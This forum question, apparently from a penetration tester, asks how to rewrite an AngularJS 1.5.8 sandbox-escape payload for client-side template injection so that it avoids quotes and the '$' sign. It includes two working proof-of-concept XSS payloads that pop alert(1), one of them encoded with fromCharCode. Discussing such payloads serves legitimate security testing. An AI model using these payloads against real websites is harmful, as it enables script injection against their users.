penetration test – Angular Expression/XSS-Payload without Quotes or “$”

I am really trying hard to exploit a Client Side Template Injection vulnerability in a webapp I am currently pentesting. Im so close to getting the payload to be executed, but I am stuck at the last little part^^. Would be great if you could help me out here.

I am able to inject a whole AngularJS expression into the html code of the serverresponse. Its a hidden input field and the value is the angular expression. We are talking about angular 1.5.8 and I already found a payload which is working with this version:

{{x = {'y':''.constructor.prototype}; x('y').charAt=().join;$eval('x=alert(1)');}}

Now the problem is that I cant use Quotes as they get output encoded and also I cant use the $ sign. It also gets output encoded as I noticed with my last try. My last idea which was working in JSfiddle was this payload:

{{$eval(x = valueOf.name.constructor.fromCharCode(120,32,61,32,123,39,121,39,58,39,39,46,99,111,110,115,116,114,117,99,116,111,114,46,112,114,111,116,111,116,121,112,101,125,59,32,120,91,39,121,39,93,46,99,104,97,114,65,116,61,91,93,46,106,111,105,110,59,36,101,118,97,108,40,39,120,61,97,108,101,114,116,40,49,41,39,41,59))}}

I dont know angular very well so if anybody can think of a way how I could write the payload at the top without quotes or $ signs it would be really great and you would help me a lot^^. I just want to get it to work xD Perfect way to test it is JSfiddle (http://jsfiddle.net/2zs2yv7o/6/, this is for 1.4.6 but you can just change it). You just need to set it to angular 1.5.8 🙂

Thanks in advance and best regards!